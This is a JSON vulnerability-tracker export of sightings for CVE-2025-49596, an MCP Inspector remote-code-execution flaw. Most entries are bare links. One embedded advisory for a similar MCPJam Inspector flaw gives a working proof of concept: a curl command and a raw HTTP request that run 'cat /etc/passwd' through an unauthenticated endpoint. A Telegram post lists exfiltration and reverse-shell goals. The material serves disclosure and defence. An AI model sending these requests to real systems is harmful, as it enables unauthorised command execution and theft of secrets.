{"vulnerability": "CVE-2025-49596", "sightings": [{"uuid": "de2ce4a4-8316-4967-86ee-6b19066b937d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/innovatopia.bsky.social/post/3lsxu6h4v5k2v", "content": "", "creation_timestamp": "2025-07-02T09:03:34.417796Z"}, {"uuid": "8c2cb329-7b7e-449e-9eec-4420cf96a8f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3lswxf3wi6t2s", "content": "", "creation_timestamp": "2025-07-02T00:28:14.929877Z"}, {"uuid": "3feae0dc-33a7-4344-aa72-72e73a19999d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3lswyu4pt4t23", "content": "", "creation_timestamp": "2025-07-02T00:54:32.298842Z"}, {"uuid": "0ec708a9-f6e9-4bc8-99f9-7ec056f0426f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://thehackernews.com/2025/07/critical-vulnerability-in-anthropics.html", "content": "", "creation_timestamp": "2025-07-01T16:03:00.000000Z"}, {"uuid": "fed6ad74-aad7-4aba-aebd-05b369564f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e3916d62-a1d16dfcef6f8287", "content": "", "creation_timestamp": "2025-07-07T19:27:14.617843Z"}, {"uuid": "94e165de-4614-4c6e-be97-ce08797ccd91", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/matricedigitale.bsky.social/post/3lsydsli2li2x", "content": "", "creation_timestamp": "2025-07-02T13:43:13.143899Z"}, {"uuid": "3fe192b3-9604-4607-a44b-d71a33126636", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-49596", "type": "seen", "source": "https://bsky.app/profile/mattreduce.com/post/3ltkhceqxhc24", "content": "", "creation_timestamp": "2025-07-09T18:33:39.794865Z"}, {"uuid": "0674fe03-b1d7-455c-ae7b-9af63c194000", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/114825404956929995", "content": "", "creation_timestamp": "2025-07-09T21:30:33.653578Z"}, {"uuid": "db7f6d94-a55d-4646-9c5b-fa0a7a6240fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lrrdo2ts332n", "content": "", "creation_timestamp": "2025-06-17T01:26:51.169632Z"}, {"uuid": "b6fd0f2f-eb8e-4f21-9631-5bc1faad5a31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://threatintel.cc/2025/07/09/serious-flaws-patched-in-model.html", "content": "", "creation_timestamp": "2025-07-09T19:30:45.000000Z"}, {"uuid": "58c94d16-a65f-44b3-9d49-d9cf7ff893fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": 
"https://bsky.app/profile/infosec.skyfleet.blue/post/3lsuu5itenq2k", "content": "", "creation_timestamp": "2025-07-01T04:24:58.933184Z"}, {"uuid": "41753d1f-0394-4647-89b5-1df9fc61e1a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3lsynrj3q3c2e", "content": "", "creation_timestamp": "2025-07-02T16:41:41.201750Z"}, {"uuid": "e5e774e3-d313-4b6c-a3a1-03ae51e5a0a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/ashishjsharda.bsky.social/post/3ltlauocqak2c", "content": "", "creation_timestamp": "2025-07-10T02:11:19.817510Z"}, {"uuid": "56142a3c-eb48-4558-9bb9-263b607c1900", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/ashishjsharda.bsky.social/post/3ltlaurju2c2c", "content": "", "creation_timestamp": "2025-07-10T02:11:20.372994Z"}, {"uuid": "329b94e2-2bd8-41f0-b633-ac1b4f1bee53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3lt2fke4dhd2g", "content": "", "creation_timestamp": "2025-07-03T09:19:42.651211Z"}, {"uuid": "8bbd28f4-cea3-468e-a78e-88b91fecabe2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lu2bmzeoiu24", "content": "", "creation_timestamp": "2025-07-16T01:34:49.011846Z"}, {"uuid": 
"15285191-de33-4fd0-bf27-01e27b651938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3lty562m4fs25", "content": "", "creation_timestamp": "2025-07-15T05:09:32.003816Z"}, {"uuid": "8d02aa88-8276-4762-bfc9-d2128676d83e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/themultiverse.bsky.social/post/3lt2hlxtzej2v", "content": "", "creation_timestamp": "2025-07-03T09:56:24.516682Z"}, {"uuid": "423acd17-7d45-493d-b7c5-47a366d9b695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3lswi3orf5b2x", "content": "", "creation_timestamp": "2025-07-01T19:54:32.634776Z"}, {"uuid": "840de666-a90c-4bff-ade1-106eea81105c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/Darkcrai86/8fa95e3e48f12d9a6bbed19c3a0503c9", "content": "", "creation_timestamp": "2025-10-09T07:14:54.000000Z"}, {"uuid": "ce6b71b0-3a9d-4a69-8117-d1d847ddb4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/bitnewsbot.bsky.social/post/3lswmtxngfk2i", "content": "", "creation_timestamp": "2025-07-01T21:19:42.047076Z"}, {"uuid": "516b5777-fb73-4173-befc-becde74ba8c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lrjelyrs452q", "content": "", "creation_timestamp": "2025-06-13T21:22:16.781834Z"}, {"uuid": "529865fa-d94a-49e2-b0f5-523711ed06be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/bytetrending.bsky.social/post/3lzkdwggo642x", "content": "", "creation_timestamp": "2025-09-24T02:04:25.596441Z"}, {"uuid": "b5391c2a-a335-4046-82ad-4a24e6379966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-49596", "type": "seen", "source": "https://bsky.app/profile/docker.com/post/3lzjajwkw7s22", "content": "", "creation_timestamp": "2025-09-23T15:31:06.256075Z"}, {"uuid": "0fb5771b-7e5d-4661-a4e6-878b41cb7254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lyvpcwgsyi25", "content": "", "creation_timestamp": "2025-09-15T21:02:24.586473Z"}, {"uuid": "475114c8-f749-4e77-8ad0-9646b1efbdcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://bsky.app/profile/techjacksolutions.bsky.social/post/3m2kpotin3w2x", "content": "", "creation_timestamp": "2025-10-06T23:00:07.894602Z"}, {"uuid": "8bd1714f-3812-421d-a167-c9eaee70366a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": 
"https://gist.github.com/seansilva-adam-bot/a1602e2414da2d1f0be6f02fc94a13d6", "content": "", "creation_timestamp": "2026-02-05T07:03:04.000000Z"}, {"uuid": "25694aea-4943-4587-91dd-6cd3852f5d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/curphey/4de77ee29a83eda55e07bf1df9116386", "content": "", "creation_timestamp": "2026-01-30T08:50:31.000000Z"}, {"uuid": "be73d089-59f7-46a8-8a17-7f0aa9060737", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/beejak/235d9793985eef4870d4d4fe221cc6fe", "content": "", "creation_timestamp": "2026-04-28T05:20:25.000000Z"}, {"uuid": "a1902af4-66ae-4a98-9a73-be927b3d6bf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/dipandhali2021/f4753824c87cbbc5ff3e94d2c9d3e54f", "content": "", "creation_timestamp": "2026-03-28T13:22:25.000000Z"}, {"uuid": "3593dbd3-0ccc-4635-a513-a857f1bf2b57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/YLjaHgOWqHy_GE2pMNrZj7K_RcmqTuBmFaJ1673d7IeXnQg", "content": "", "creation_timestamp": "2025-06-13T21:00:48.000000Z"}, {"uuid": "0ca70b85-c587-4bca-aac4-38a067981f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18339", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber 
Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49596\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.\n\ud83d\udccf Published: 2025-06-13T20:11:40.453Z\n\ud83d\udccf Modified: 2025-06-13T20:11:40.453Z\n\ud83d\udd17 References:\n1. https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g\n2. https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979", "creation_timestamp": "2025-06-13T20:35:33.000000Z"}, {"uuid": "0db6a0d3-a185-4863-a834-815c6e09d050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/beejak/c190bcb8f8b76e8b2200faef11e807d6", "content": "", "creation_timestamp": "2026-04-28T04:41:41.000000Z"}, {"uuid": "765325fc-cdd7-408f-bf61-63a71bc4438c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/10020", "content": "Critical RCE in Anthropic MCP Inspector (CVE-2025-49596) Enables Browser-Based Exploits | Oligo Security\n\nhttps://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596", "creation_timestamp": "2025-07-02T13:24:01.000000Z"}, {"uuid": "2d4215ec-a97b-4bab-99e4-e9fcb7575731", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/GithubRedTeam/42862", "content": "GitHub monitoring alert!!! \n\nUpdated: CVE-2025\nDescription: CVE-2025-32462 Exploit\nURL: https://github.com/ashiqrehan-21/MCP-Inspector-CVE-2025-49596\n\nTags: #CVE-2025", "creation_timestamp": "2025-07-03T16:12:05.000000Z"}, {"uuid": "a109d0f7-f31b-495c-9da6-27716ae52e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/poxek/5322", "content": "\ud83d\udd10 RCE vulnerability in MCP Inspector - don't let an LLM take over your machine\n\nIt's no secret that AI (LLMs) is being actively adopted in company workflows today - for task automation, code generation, DevOps and more. But fast experiments often bring big risks with them.\n\ud83e\udde0 If you integrate an LLM (for example ChatGPT, Claude, Copilot, etc.) with local tools via the MCP protocol, be extremely careful with the debugging web interface - MCP Inspector. It is a web interface through which commands can be sent on behalf of the LLM for execution on your system: curl, python3, ls and so on.\n\nBy default it runs on 127.0.0.1:6274 and requires a token. But: some people forget that the DANGEROUSLY_OMIT_AUTH=true variable completely disables authorization, and ports can accidentally end up forwarded to the outside (via Docker, nginx, ngrok, etc.);\nIn that case anyone who finds the interface gets remote command execution (RCE).\n\n\ud83c\udfaf Combined with, for example, the CVE-2025-49596 Auth Bypass and others not yet disclosed, an attacker can:\nExfiltrate sensitive files (/etc/passwd, .ssh/id_rsa, .env), install a miner or a backdoor, open a reverse shell and use the machine as an entry point into the infrastructure.\n\n\ud83d\udee1\ufe0f How to protect yourself?\n1. Never disable authorization (`DANGEROUSLY_OMIT_AUTH=true`) - even on localhost.\n2. MCP Inspector should be reachable only locally, and only when actually needed.\n3. Make sure port 6274 is not forwarded to the outside (especially when using Docker).\n4. Isolate the environment that hosts the integration in a DMZ with no direct access to the main infrastructure.\n\n\ud83e\uddca We are all walking on thin ice: tools like MCP are evolving rapidly and do not always get proper security review. Keep that in mind - especially when working with LLMs that can execute arbitrary commands inside your system.", "creation_timestamp": "2025-06-30T14:15:15.000000Z"}, 
{"uuid": "8d74d705-04bf-4cfd-bafc-fa5fab9308d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/HMcM9813eIJOyuNo5YZNbIe038j7zzCtsVC9QJ1AyxhmRyM", "content": "", "creation_timestamp": "2025-07-04T03:00:09.000000Z"}, {"uuid": "d3efdefb-51ea-4846-872a-75db8f59c80e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://t.me/CyberBulletin/3600", "content": "\u26a1\ufe0fCritical RCE Vulnerability in Anthropic MCP Inspector - CVE-2025-49596.\n\n#CyberBulletin", "creation_timestamp": "2025-07-07T21:59:04.000000Z"}, {"uuid": "bde2145f-587e-470f-84b3-c9fadb00ee90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "published-proof-of-concept", "source": "Telegram/RwxI053Evvt9D_WU2CEPzLIpQuMsrIeDnG8Eg4nvRFYLzdw", "content": "", "creation_timestamp": "2025-07-03T21:00:04.000000Z"}, {"uuid": "64281553-2c8d-4a1e-bf9e-f39ee653678a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2025-49596", "type": "seen", "source": "Telegram/vo7yuH8LHyBXdHaE9wQLrp0tWIgPlLAwJO56KKBjpmx2jw", "content": "", "creation_timestamp": "2025-07-01T20:05:18.000000Z"}, {"uuid": "8f736bf8-0ba5-4f0b-8bdf-640f1883eda2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-49596", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "\n\n### Summary\n\nMissing authentication on MCP Manager and Adapter HTTP API endpoints allows any network-accessible attacker to execute arbitrary MCP tools without authentication. When a used MCP server allows system command execution capabilities, this vulnerability could be exploited to perform Remote Code Execution (RCE).\n\nThis vulnerability is similar to [CVE-2026-23744](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) and [CVE-2025-49596](https://github.com/advisories/GHSA-7f8r-222p-6f5g). This vulnerability is exploitable with no user interaction and doesn't require authentication. 
Since MCPJam Inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n### Details\n\nThe `/api/mcp/adapter-http/:serverId` and `/api/mcp/manager-http/:serverId` endpoints are explicitly excluded from authentication middleware in server/middleware/session-auth.ts (lines 45-46):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/middleware/session-auth.ts#L45\n\nconst UNPROTECTED_PREFIXES = [\n  ...\n  \"/api/mcp/adapter-http/\", // HTTP adapter for tunneled MCP clients - auth via URL secrecy\n  \"/api/mcp/manager-http/\", // HTTP manager for tunneled MCP clients - auth via URL secrecy\n];\n```\n\nThese endpoints accept JSON-RPC requests and forward them directly to connected MCP servers without any authentication checks (see server/routes/mcp/http-adapters.ts, lines 149-159):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/routes/mcp/http-adapters.ts#L149\n\nconst response = await handleJsonRpc(\n  normalizedServerId,\n  body as any,\n  clientManager,\n  mode,\n);\nreturn c.json(response);\n```\n\nSince MCPJam Inspector binds to `0.0.0.0` by default, its HTTP APIs are remotely reachable. An attacker requires:\n\n* Network connectivity to MCPJam Inspector (local network, Docker exposed port, or HOSTED_MODE deployment)\n* Knowledge or enumeration of a valid `serverId` (common values: \"local\", \"default\", \"asana\", \"github\", \"notion\")\n\n**No authentication, authorization, or request validation is performed.**\n\n### PoC\n\nRun MCPJam using the command below:\n\n```bash\nnpx @mcpjam/inspector@latest\n```\n\nThen install an MCP server that allows running system commands. 
I used the following MCP server as an example which allows running system commands: [mac-shell-mcp](https://github.com/cfdude/mac-shell-mcp).\n\nYou can invoke this MCP server through MCPJam directly without authentication through the following HTTP request. Below is the curl request; notice that it doesn't require any authentication or an authorization bearer token in the header:\n\n```bash\ncurl --path-as-is -i -s -k -X POST \\\n  -H 'Host: 127.0.0.1:6274' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\n  \"jsonrpc\": \"2.0\",\n  \"id\": 2,\n  \"method\": \"tools/call\",\n  \"params\": {\n    \"name\": \"execute_command\",\n    \"arguments\": {\n      \"command\": \"cat\",\n      \"args\": [\"/etc/passwd\"]\n    }\n  }\n}' \\\n  'http://127.0.0.1:6274/api/mcp/adapter-http/shell-mcp'\n```\n\nYou can also use Burp Proxy to send the request below directly:\n\n```http\nPOST /api/mcp/adapter-http/shell-mcp HTTP/1.1\nHost: 127.0.0.1:6274\nContent-Type: application/json\nContent-Length: 195\n\n{\n    \"jsonrpc\": \"2.0\",\n    \"id\": 2,\n    \"method\": \"tools/call\",\n    \"params\": {\n      \"name\": \"execute_command\",\n      \"arguments\": {\"command\": \"cat\",\n\"args\":[\" /etc/passwd\"]}\n    }\n  }\n```\n\nThis issue was found on version `v1.5.16`.\n\n### Impact\n\nThis vulnerability allows unauthorized remote attackers to execute arbitrary MCP tools without authentication, leading to complete compromise of the system when shell-enabled MCP servers are connected. 
The impact severity depends on the capabilities of the connected MCP servers:\n\n* **Unauthorized Tool Execution:** Attackers can invoke any MCP tool exposed by connected servers without authentication, bypassing all authorization controls.\n* **Data Exfiltration:** Unauthorized access to sensitive data through MCP resource reads, database queries, or file system operations.\n* **Remote Code Execution (RCE):** Direct system command execution through MCP servers like mac-shell-mcp, filesystem-mcp, or custom servers with command execution capabilities.\n* **Privilege Escalation:** If MCPJam Inspector runs with elevated privileges, attackers inherit those privileges for command execution.\n\n### Attack Scenarios:\n\n* **Local Network Attack:**  Attacker on the same LAN (corporate network, coffee shop WiFi, shared workspace) can directly access exposed MCPJam endpoints.\n* **Cloud Deployment Attack:** HOSTED_MODE deployments without proper network isolation are accessible from the internet.\n* **Docker Misconfiguration:**  Users running docker run -p 6274:6274 expose the vulnerability to anyone who can reach the host machine.\n", "creation_timestamp": "2026-06-12T18:31:30.000000Z"}]}